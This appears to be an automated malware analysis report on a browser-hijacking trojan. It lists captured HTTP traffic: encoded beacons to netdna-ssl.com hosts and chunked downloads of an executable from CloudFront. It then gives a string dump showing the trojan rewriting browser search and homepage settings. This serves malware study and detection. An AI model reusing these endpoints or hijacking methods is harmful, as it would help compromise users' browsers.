X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=emKxDesqhYd0cn8dtkQxkGzsB4UpbIWe/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8Fj0N7bp/0QtQiDxPRY4o5upR90anDedSC8zQYNnumFEUDrjljoTj1aS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:40 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=yhrBLBbZM9XWk3RCzFhOxt1vyTAtA4H6nvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3NykvhuQZCu9SilNqGvv5sqhroCJzCloYCM2TyBeHeUDdpdJsivMaAupUnTb/7 kcvPCjjpeJfJMiPTs0JQd5HxgIXd/dqaEYXgO73EZkAAgR/jmD45dkR0v8UWHBzcD5RH2WGmZgVxWuSt5QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd0FDlcFDeqjJvIG12bLr74m6Sgzed9jU3Gw34XvFcQj8w== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:41 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6FzoNt4Ofsjzs1eJiiYYwojgb6v7cXpPt9ePa7EDGSBlkjSRpv2UaTaJBfeNRzkdxluevdybjIM/AF/Crll2X X6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6MAVuazOQA/ySFcG0T/jYU B 0jBTIO6c/Y3m6kr9yYrPiCC4paVhduf EAUeb6vWyyBfgdC/MPMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=xY8ohDYpM iI4k8LaFSbfxwGEJPpfW5hnvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3NykvhuQZCu9SilNqGvv5sqhroCJzCloYCM2TyBeHeUDdpdJ0ATae6NSkcuPFGXl7hYw KKij 6dP1w7xUocEPa3gnWqHhSQCg8CtCUHeR8YCF3QLiqBH6WCl3xZWevahYfV1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfHe9cth/iONogRWgA6z07xsaPrTALJM48= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=I6hFHi0H7G9mS6nlSU/NTiVyAMJyiE6S/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/EV70QiN1eataC2D7gVLsXVWyif 2VH4gFagtWkIz2IRYYxS7TafJldpRLkLxiEf34PLsGMxUda/E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:44 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /smw121634dp.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 09:28:55 GMT
Content-Range: bytes 250000-499999/3359008
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: So5oE5-DUkXFXTcVLupLZLO0DjbaO4s_cx-8d9QPnCCWLeKv4wsN9Q==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 09:28:55 GMT
Content-Range: bytes 750000-999999/3359008
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: UzDcpR2CG-tuO9SxA8fXw-QQHU-HPz1IQ6f9LCn517WYbLz8DwS5Dw==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 16:56:59 GMT
Content-Range: bytes 1250000-1499999/3359008
Age: 1
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: u8bWJAW4ZrhHKSurJfV1TVKU64Ya8NmGDSKTd308dadUFxKh1v0Fcg==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 16:56:59 GMT
Content-Range: bytes 1750000-1999999/3359008
Age: 1
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2gPe8cmAKFEPDJbFopHV8LverVGV2xrNLU2BYXmq2sspC2qLcEIvEA==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 16:56:59 GMT
Content-Range: bytes 2000000-2249999/3359008
Age: 1
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 7NZmZ9C4S_WsK_tMH83OqEiOYZ1zT2BwyqoCRCEOHrxBFN1EdmDFKg==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2500000-2749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 16:56:59 GMT
Content-Range: bytes 2500000-2749999/3359008
Age: 1
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qRNT14uF92zczRha-STto9eTW8-Ob2v4PlstduXk4PnQGgKceW4YEg==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=3000000-3249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 17:05:21 GMT
Content-Range: bytes 3000000-3249999/3359008
Age: 1
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: FOhvWczZ5di9XQKhsxL91vJ6fHVllNRxdLzlMNyQ4UWL5ZcUr94mNA==

<<< skipped >>>

GET /12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXah KANE5N7oCaDOhvvrNRpfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXx3vXLYf4jjaIEVoAOs9O8bGj60wCyTOP HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:53 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /t.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1VKXe7b3ey81Z7hCmg7VZxoKYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMdF2wYySv2jl HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: qko863p80c-mzxspesu.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....



GET /t.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1VKXe7b3ey81Z7hCmg7VZxoKYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMdF2wYySv2jl HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: qko863p80c-mzxspesu.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....



GET /t.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1VKXe7b3ey81Z7hCmg7VZxoKYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMdF2wYySv2jl HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: qko863p80c-mzxspesu.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk


GET /12466.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWt6/KwEvQjAfCESiW wqgeJJNlRzoCiiPdLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:37 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /12466.ashx?e=K24uUiBczqdmS6nlSU/NTrtoX8KCsVAM/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGSoNjFwE9Y5NLhu0b45kiT yMyEnHNejvIwWNawbTP05KYX3Ti/i3YObVFZJeaqFdk1VfCEU0AOklTie0zE 5RJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXx3vXLYf4jjaIEVoAOs9O8bGj60wCyTOP HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /12466.ashx?e=iAb9K1DDBHUinMwQKODRlCD/q4eoirb7IM0CqmsRfbtxTYwWxYG9WEEY41XBMtFk/h9mchShIbTzFrgVq4jsEiR1q1S/V1rzDyhRDL0PLalNTvXaKqGxaNCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


The Trojan connects to the servers at the following location(s):

smu.exe_2964:

.text
`.rdata
@.data
.rsrc
@.reloc
[email protected]
<:%u4
t8Ht.HHt#
F2t%f
#t.Ht
 2 34 567
j.Yf;
_tcPVj@
.PjRW
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
operator
GetProcessWindowStation
?456789:;<=
!"#$%&'()* ,-./0123
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.2.3
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
3.7.2
CREATE TEMP TABLE sqlite_temp_master(
208.69.150.250
208.69.150.252
8.8.8.8
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
Catcher.ProcessId:
Catcher.Path:
Watcher.Filter:
2.3.12.1634
smu.exe
Chrome
Report.xml
/Url:
Report factory:
Update.xml
URLSet
Report
homeURL
suggestURL
newTabURL
ieSearchURL
chSearchURL
ffSearchURL
opSearchURL
chromeKeyword
[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]
vup.tmp
Argument.CheckResult:
Argument.IsRunning:
Delivery of report succeeded. TaskId:
Delivery of report failed.
SHDeleteKeyW
RegDeleteKeyExA
RegDeleteKeyExW
CCCzdef1,11111111-1111-1111-1111-111111111111
NtQueryKey
1.3.6.1.4.1.311.2.1.12
urls
ERROR: %s
SELECT * FROM urls
WebData path:
favicon_url
keyword
originating_url
suggest_url
keywords
keyword LIKE '
WHERE key = 'Default Search Provider ID'
key = 'Default Search Provider ID'
DELETE from keywords WHERE id =
search_url
icon_url
startup_urls
chrome_url_overrides
urls_to_restore_on_startup
www-searching.com
template_url_data
image_url_post_params
instant_url
instant_url_post_params
search_terms_replacement_key
new_tab_url
search_url_post_params
suggestions_url
suggestions_url_post_params
chrome_settings_overrides
session.startup_urls
web_url
search_icon.png
&#xX;
</%s>
%s="%s"
%s='%s'
<![CDATA[%s]]>
<!--%s-->
version="%s"
encoding="%s"
standalone="%s"
Snapshot.xml
MozillaFirefox
GoogleChrome
AboutTabsUrl
HomePageUrl
DefaultProviderKeyword
UrlsToRestoreOnStartup
StartupHomepageUrl
Chrome propagate flags:
Firefox propagate flags:
ParentKey:
2, 3, 12, 1634
Envelop.xml
UrlSet
Configuration.xml
Opera
StartPageUrl
AboutTabUrl
SearchScopeUrl
SearchScopeIconUrl
SearchScopeSuggestUrl
DefaultProviderSearchUrl
DefaultProviderIconUrl
DefaultProviderSuggestUrl
SearchPluginUrl
SearchPluginSuggestionUrl
TabPageUrl
SearchEngineFaviconUrl
SearchEngineSuggestionUrl
SearchEngineSearchUrl
SearchEngineKeyword
System.xml
Reset-2.1.0.7
ReportUrl
UpdateUrl
ReportDlls
User.xml
Argument.Snapshot:
Argument.GeneralConfig:
Argument.Flags:
Argument.StartPage:
Argument.Autosearch:
Argument.NewTabPageShow:
Argument.SearchScopeId:
Argument.Tabs:
select count(*) from sqlite_master where type = 'table' and name = '
%d-%m-%Y %H:%M, %a
unable to close due to unfinished backup operation
SQL logic error or missing database
large file support is disabled
unknown database: %s
no such vfs: %s
misuse at line %d of [%.10s]
database corruption at line %d of [%.10s]
cannot open file at line %d of [%.10s]
SQLITE_
d-d-d d:d:d
d-d-d
d:d:d
failed memory resize %u to %u bytes
failed to allocate %u bytes of memory
API call with %s database connection pointer
922337203685477580
RowKey
%s-shm
OsError 0x%x (%u)
%s\etilqs_
Recovered %d frames from WAL file %s
2nd reference to page %d
invalid page number %d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
Page %d:
freelist leaf count too big on page %d
btreeInitPage() returns error code %d
unable to get the page. error code=%d
On tree page %d cell %d:
On page %d at right child:
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
keyinfo(%d
%s(%d)
foreign key constraint failed
%s-mjX
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
constraint failed at %d in [%s]
abort at %d in [%s]: %s
no such savepoint: %s
cannot open savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot %s savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
sqlite_master
cannot change %s wal mode from within a transaction
statement aborts at %d: [%s] %s
database table is locked: %s
cannot open view: %s
cannot open virtual table: %s
foreign key
no such column: "%s"
cannot open %s column for writing
indexed
cannot open value of type %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
variable number must be between ?1 and ?%d
Expression tree is too large (maximum depth %d)
too many columns in %s
too many SQL variables
misuse of aggregate: %s()
%s%.*s"%w"
%.*s"%w"%s
sqlite_rename_table
sqlite_rename_parent
sqlite_rename_trigger
%s OR name=%Q
there is already another table or index with this name: %s
table %s may not be altered
sqlite_
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
sqlite_sequence
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat1
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE tbl=%Q
invalid name: "%s"
SELECT idx, stat FROM %Q.sqlite_stat1
too many attached databases - max %d
database %s is already in use
unable to open database: %s
cannot detach database %s
no such database: %s
database %s is locked
sqlite_attach
sqlite_detach
%s %T cannot reference objects in database %s
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
object name reserved for internal use: %s
too many columns on %s
there is already an index named %s
default value of column [%s] is not constant
duplicate column name: %s
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
table "%s" has more than one primary key
no such collation sequence: %s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE %s %.*s
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
table %s may not be dropped
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
use DROP VIEW to delete view %s
use DROP TABLE to delete table %s
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %s.sqlite_sequence WHERE name=%Q
foreign key on %s should reference only one column of table %T
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
indexed columns are not unique
table %s may not be indexed
virtual tables may not be indexed
views may not be indexed
index %s already exists
there is already a table named %s
table %s has no column named %s
sqlite_autoindex_%s_%d
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
CREATE%s INDEX %.*s
no such index: %S
DELETE FROM %Q.%s WHERE name=%Q
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q
a JOIN clause is required before %s
unable to identify the object to be reindexed
cannot modify %s because it is a view
table %s may not be modified
sqlite_source_id
sqlite_version
sqlite_compileoption_get
sqlite_compileoption_used
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has no column named %s
%d values for %d columns
%s.%s may not be NULL
PRIMARY KEY must be unique
sqlite3_extension_init
no entry point [%s] in shared library [%s]
unable to open shared library [%s]
automatic extension loading failed: %s
error during initialization: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
unsupported file format
database schema is locked: %s
RIGHT and FULL OUTER JOINs are not currently supported
unknown or unsupported join type: %T %T%s%T
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
cannot join using column %s - column not present in both tables
%s.%s
ORDER BY clause should come after %s not before
%s:%d
SELECTs to the left and right of %s do not have the same number of result columns
LIMIT clause should come after %s not before
sqlite_subquery_%p_
no such index: %s
no such table: %s
